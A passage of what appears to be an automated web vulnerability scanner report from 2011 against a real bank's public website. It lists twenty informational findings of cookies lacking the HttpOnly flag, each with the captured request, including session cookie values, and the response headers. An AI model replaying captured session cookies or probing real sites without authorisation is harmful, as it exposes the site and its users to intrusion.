<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"><head><script type="text/javascript" src="/java
...[SNIP]...

11.708. https://www.wellsfargo.com/jump/wachovia/insurance/identity  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /jump/wachovia/insurance/identity

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /jump/wachovia/insurance/identity HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:06 GMT
Content-length: 6816
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=L8vkNJhRGXvkQ866j1p1HL661fxkJ10Hh3p3z1R94dLrvJqJY68V!854257767; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2180274954.16927.0000; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"><head><script type="text/javascript" src="/java
...[SNIP]...

11.709. https://www.wellsfargo.com/jump/wachovia/mortgage/firsttimebuyer  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /jump/wachovia/mortgage/firsttimebuyer

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /jump/wachovia/mortgage/firsttimebuyer?dm=DMIWEWACP5 HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:04 GMT
Content-length: 5035
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=DwMVNJhQNzWpcNmrc2WYz9Rr7yXFhLPn21Q7n9DDVSqvxMx8Q9mT!-427629300; domain=.wellsfargo.com; path=/; secure
Set-Cookie: dm=DMIWEWACP5; domain=.wellsfargo.com; expires=Friday, 04-Mar-2011 22:29:04 GMT; path=/
Set-Cookie: ISD_WCM_COOKIE=1827953418.16927.0000; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"><head><script type="text/javascript" src="/java
...[SNIP]...

11.710. https://www.wellsfargo.com/locator  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /locator

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /locator HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 302 Moved Temporarily
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:19 GMT
Location: https://www.wellsfargo.com/locator/
Set-Cookie: ISD_WCM_COOKIE=2079611658.16927.0000; path=/
Connection: close

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="https://www.wellsfargo.com/locator
...[SNIP]...

11.711. https://www.wellsfargo.com/locator/atm/preSearch  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /locator/atm/preSearch

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /locator/atm/preSearch HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 302 Moved Temporarily
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:19 GMT
Content-type: text/html
Cache-Control: no-cache="Set-Cookie"
Location: https://www.wellsfargo.com/locator/atm/search
Set-Cookie: wcmcookieloc=NGyJNJhfZkJQBpWrs3zCZbWZdbfpMmq2j01SwVrYQ028TBgjR5nW!-1273606700; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=1777621770.16927.0000; path=/
Connection: close

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="https://www.wellsfargo.com/locator
...[SNIP]...

11.712. https://www.wellsfargo.com/locator/atm/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /locator/atm/search

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /locator/atm/search HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:17 GMT
Content-type: text/html; charset=ISO-8859-1
Cache-Control: no-cache="Set-Cookie"
Set-Cookie: wcmcookieloc=mdg4NJhdq2DWYbbpdNp9BF000vJcqLG9gHCnvKSjFpn4l8Jr1tl9!898739336; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2398378762.16927.0000; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">


<head>

<title>Wells Fargo Locations<
...[SNIP]...

11.713. https://www.wellsfargo.com/mortgage/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /mortgage/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /mortgage/ HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:41 GMT
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=9VjQNJhV9tfpnq1TVd2hsJPwPGsqdkCgbFhYGJsJTrttBpTLdsjY!-705334509; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2163497738.16927.0000; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">

<head>
<title>Mortgage Information .
...[SNIP]...

11.714. https://www.wellsfargo.com/mortgage/rates  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /mortgage/rates

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /mortgage/rates?dm=DMIWFHPRAT HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:43 GMT
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=fZ0GNJhXbp9NkTTBKxLLgWdBC8515ftXhHp83yTlYbMCkvhQHzFT!-1408825807; domain=.wellsfargo.com; path=/; secure
Set-Cookie: dm=DMIWFHPRAT; domain=.wellsfargo.com; expires=Friday, 04-Mar-2011 22:29:43 GMT; path=/
Content-Language: en
Set-Cookie: ISD_WCM_COOKIE=1693735690.16927.0000; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head><title>Wells Fargo Home Mortgage - To
...[SNIP]...

11.715. https://www.wellsfargo.com/online_brokerage/education/trading/volatile/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /online_brokerage/education/trading/volatile/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /online_brokerage/education/trading/volatile/ HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:30:01 GMT
Content-type: text/html; charset=ISO-8859-1
Set-Cookie: wcmcookiewf=C7mMNJhJpXQ7FGYBpppzvY2tZP2qr0klzqyBTrZnLhD8HsmsB5nr!-427629300; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=1827953418.16927.0000; path=/
Connection: close


<IMPORTBEAN BEAN="/wellsfargo/www/onlinebrokerage/education/TradingCatalog">
<head>
<title>Wells Fargo Online Brokerage</title>

<script language="JavaScript" type="text/javascript">


       document.w
...[SNIP]...

11.716. https://www.wellsfargo.com/per/more/banking  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /per/more/banking

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /per/more/banking HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:39 GMT
Content-length: 10949
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=mFfWNJhTM3LCLw1nwcXCmgZQLT7M2yhK3vfsDDQBTdRL5f6czJbj!1127287699; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2431933194.16927.0000; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head><title>Wells Fargo Banking Overview</
...[SNIP]...

11.717. https://www.wellsfargo.com/per/more/loans_credit  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /per/more/loans_credit

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /per/more/loans_credit HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:40 GMT
Content-length: 10611
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=LlvBNJhJC3mhJb9Rgj7RS9w1WVHnp24RLXcRh0pK5HRNch3Gxxnz!1697366244; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2096388874.16927.0000; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">

<head>
<title>Wells Fargo - Loans an
...[SNIP]...

11.718. https://www.wellsfargo.com/personal_credit/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /personal_credit/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /personal_credit/ HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:47 GMT
Content-length: 7834
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=S850NJhbvFyXKFsqjRkSJvyZ8MVlMvnnZvZ8BtWvJdLCFxx1ZSxH!-887259216; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2566150922.16927.0000; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">

<head>
<title>Wells Fargo - Personal C
...[SNIP]...

11.719. https://www.wellsfargo.com/personal_credit/rate_payments/rate_calc_main  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /personal_credit/rate_payments/rate_calc_main

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /personal_credit/rate_payments/rate_calc_main HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:48 GMT
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=TC2fNJhcJvc8bQh2DP2GHJBG108y42PYVj4VDGmL2nJ0bZdjh3Lq!854257767; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2180274954.16927.0000; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head><title>Wells Fargo ... Rate & Payment
...[SNIP]...

11.720. https://www.wellsfargo.com/privacy_security/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /privacy_security/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /privacy_security/ HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:31 GMT
Content-length: 7654
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=5MdgNJhLPQJrJbQL2dj2np2B79whD7Gkrq9kkphmPHd9S35MYVGj!457746116; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2062834442.16927.0000; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head><title>Wells Fargo Privacy & Security
...[SNIP]...

11.721. https://www.wellsfargo.com/privacy_security/fraud/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /privacy_security/fraud/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /privacy_security/fraud/ HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:29 GMT
Content-length: 7546
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=yVv2NJhJb35jxN6JYsp0LJR40jSkyXq8BL1vVYQycy3X5yBqpGnH!-1164025042; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2633259786.16927.0000; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">

<head>
<title>Wells Fargo Privacy an
...[SNIP]...

11.722. https://www.wellsfargo.com/privacy_security/fraud/report/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /privacy_security/fraud/report/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /privacy_security/fraud/report/ HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:27 GMT
Content-length: 6368
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=vJxpNJhHLn21ThPNMCWcdb7TJvhkn1h6BwPSlv9wX4vqvRzqm8Cv!312685559; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2264161034.16927.0000; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head><title>Wells Fargo Privacy and Securi
...[SNIP]...

11.723. https://www.wellsfargo.com/privacy_security/fraud/report/fraud  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /privacy_security/fraud/report/fraud

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /privacy_security/fraud/report/fraud HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:29 GMT
Content-length: 5794
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=sGGJNJhJvdHFzNC5MkDQXh52s09R1dnm7LNy8v1BGT8qQTbWpMvl!-213655893; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2448710410.16927.0000; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head><title>Wells Fargo Privacy and Securi
...[SNIP]...

11.724. https://www.wellsfargo.com/privacy_security/online/guarantee  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /privacy_security/online/guarantee

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /privacy_security/online/guarantee HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:31 GMT
Content-length: 7173
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=ZWxLNJhLlFLsVdPS3Q2mcXf3Hh6RcqmGMcp1f68BhHGpyYSdLNJr!-180776916; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=1811176202.16927.0000; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head><title>Wells Fargo Privacy and Securi
...[SNIP]...

11.725. https://www.wellsfargo.com/products_services/HE_selector  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /products_services/HE_selector

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /products_services/HE_selector HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 302 Moved Temporarily
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:58 GMT
Location: https://www.wellsfargo.com/customerApp/jsp/products_services/HE_selector.jsp
Set-Cookie: wcmcookiewf=Z24pNJhG811khdlryT1wFK10GQBcQnR52yn1FwnyvQyZpkwyblxT!-1966973819; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2616482570.16927.0000; path=/
Connection: close

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="https://www.wellsfargo.com/custome
...[SNIP]...

11.726. https://www.wellsfargo.com/products_services/applications_viewall  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /products_services/applications_viewall

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /products_services/applications_viewall HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:59 GMT
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=pG7tNJhHLB1vQvYZNyr4dHYbT2y4l2WdqgQNVV7HxGrQqxWLchvv!-1657447489; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2348047114.16927.0000; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head><title>Wells Fargo - Apply for an Acc
...[SNIP]...

11.727. https://www.wellsfargo.com/products_services/brokerage_cklist  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /products_services/brokerage_cklist

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /products_services/brokerage_cklist HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
